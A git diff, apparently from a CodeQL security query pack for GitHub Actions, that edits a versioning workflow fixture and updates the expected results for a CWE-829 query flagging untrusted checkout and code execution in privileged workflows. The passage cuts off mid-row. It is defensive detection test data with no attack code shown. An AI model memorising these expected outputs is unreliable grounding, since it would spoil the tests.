github.rest.issues.createComment({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - body: '👋 Added [same version] label :)!' - }) - build: if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') runs-on: ubuntu-latest @@ -75,26 +49,3 @@ jobs: run: | ./version.sh -u -p echo "BUMP_TYPE=patch" >> $GITHUB_ENV - - - name: Add labels - uses: actions/github-script@v6 - if: ${{ env.BUMP_TYPE }} - with: - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['version/${{ env.BUMP_TYPE }}'] - }) - - - name: Push Changes - if: ${{ env.BUMP_TYPE }} - run: | - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git pull - git add . - git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff - git push - diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index baf354179b3e..237928fc8927 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -265,6 +265,8 @@ edges | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -274,16 +276,14 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | -| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | | .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | @@ -294,44 +294,44 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | 